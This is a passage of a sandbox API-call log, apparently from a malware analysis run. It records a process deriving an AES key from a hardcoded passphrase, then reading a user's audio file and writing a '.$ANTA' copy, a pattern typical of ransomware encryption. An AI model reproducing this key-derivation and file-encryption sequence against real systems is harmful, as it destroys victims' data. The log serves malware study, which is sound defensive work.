| out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0115.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0115.893] CryptAcquireContextA (in: phProv=0x144e558, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e558*=0x41a4728) returned 1 [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.894] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0115.894] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.894] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.894] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0115.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cabb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0115.894] CryptCreateHash (in: hProv=0x41a4728, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e2c8 | out: phHash=0x144e2c8) returned 1 [0115.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.894] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0115.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cad60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0115.895] CryptHashData (hHash=0x41ac640, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0115.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.895] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0115.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac58, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0115.895] CryptDeriveKey (in: hProv=0x41a4728, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e2c8 | out: phKey=0x144e2c8*=0x41ac6c0) returned 1 [0115.895] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0115.895] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0115.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0115.895] CryptDestroyHash (hHash=0x41ac640) returned 1 [0115.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea6b8 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0115.896] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0115.896] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0115.896] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eaa90 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0115.897] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\zmkzmhlwmmpv7lz.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0115.897] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0115.897] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea00 | out: lpNewFilePointer=0x0) returned 1 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0115.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.898] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0115.898] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0115.898] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0115.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0115.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ad0 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0115.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0115.900] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy")) returned 0x10 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0115.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0115.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0115.900] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\zmkzmhlwmmpv7lz.m4a.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0115.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0115.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0115.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0115.901] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0115.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0115.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0115.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0115.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0115.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0115.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0c020 [0115.905] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ea50 | out: lpNewFilePointer=0x0) returned 1 [0115.905] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x10000, lpOverlapped=0x0) returned 1 [0115.908] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x32ef, lpOverlapped=0x0) returned 1 [0115.908] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ea78, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ea78*=0x0, lpOverlapped=0x0) returned 1 [0115.908] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0115.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0115.909] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0115.909] 